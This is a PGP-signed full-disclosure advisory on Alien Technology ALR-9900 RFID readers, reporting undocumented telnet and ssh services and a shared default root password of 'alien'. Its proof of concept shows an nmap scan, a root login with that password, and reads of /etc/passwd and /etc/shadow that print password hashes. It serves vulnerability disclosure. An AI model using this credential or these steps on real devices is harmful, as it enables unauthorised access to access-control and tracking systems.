-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Tested: www.alientechnology.com/readers/alr9900.php Background: Alien Technology is a major rfid-reader designer and manufacturer. Alien's products are sold to many corporations and the military. Alien's readers can be interfaced with in several ways including: serial, IO Port and Ethernet port. Alien has several daemons running on their reader that accessible through Ethernet and completely undocumented. We called Alien several times to ask them about these undocumented services and were first deferred to technical support and then had our numbers blocked. We then emailed them about the security ramifications of these daemons and received no reply. The Undocumented: port 2323 - telnetd port 23 - telnetd port 22 - sshd The Flaws: default root password = 'alien' alien account has same password across all readers port 2323 - provides a backdoor onto the readers for anyone who knows the alien (or root) account password port 23 - "" port 22 - "" The P.O.C: Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific Daylight Time Nmap scan report for XXX.XXX.XXX.XXX Host is up (0.000092s latency). Not shown: 995 closed ports PORT STATE SERVICE 22/tcp open ssh 23/tcp open telnet 80/tcp open http 111/tcp open rpcbind 2323/tcp open unknown MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology) Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds login as: root Using keyboard-interactive authentication. Password: <- root Access denied Using keyboard-interactive authentication. Password: <- password Access denied Using keyboard-interactive authentication. Password: <- alien Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX root@alien-XXXXXX alien# id uid=0(root) gid=0(root) groups=0(root) root@alien-XXXXXX alien# cat /etc/passwd root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/bin/sh bin:*:2:2:bin:/bin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh sync:*:4:65534:sync:/bin:/bin/sync man:*:6:12:man:/var/cache/man:/bin/sh lp:*:7:7:lp:/var/spool/lpd:/bin/sh mail:*:8:8:mail:/var/mail:/bin/sh news:*:9:9:news:/var/spool/news:/bin/sh uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh proxy:*:13:13:proxy:/bin:/bin/sh www-data:*:33:33:www-data:/var/www:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh list:*:38:38:Mailing List Manager:/var/list:/bin/sh irc:*:39:39:ircd:/var/run/ircd:/bin/sh gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:*:65534:65534:nobody:/nonexistent:/bin/sh sshd:x:100:65534::/var/run/sshd:/bin/false ntpd:x:102:102::/var/run/openntpd:/bin/false alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,,:/home/alien:/bin/bash root@alien-XXXXXX alien# cat /etc/shadow ntpd:!:13602:0:99999:7::: sshd:!:13602:0:99999:7::: alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7::: Impact: Alien's readers are deployed in many secure facilities with typically closed networks. Although these networks are closed, these undocumented services could allow employees to modify reader settings and subvert checkout systems. These checkout systems are often used to track valuable items making such vulnerabilities a serious matter. If these readers are deployed on an open or large network they provide an easy way to tunnel into the network or attack it from an unexpected location. Lastly, if someone cracks the alien account's password hash they get to use Alien's backdoor. -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc 0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8 ZXExxzM= =Bb1k -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/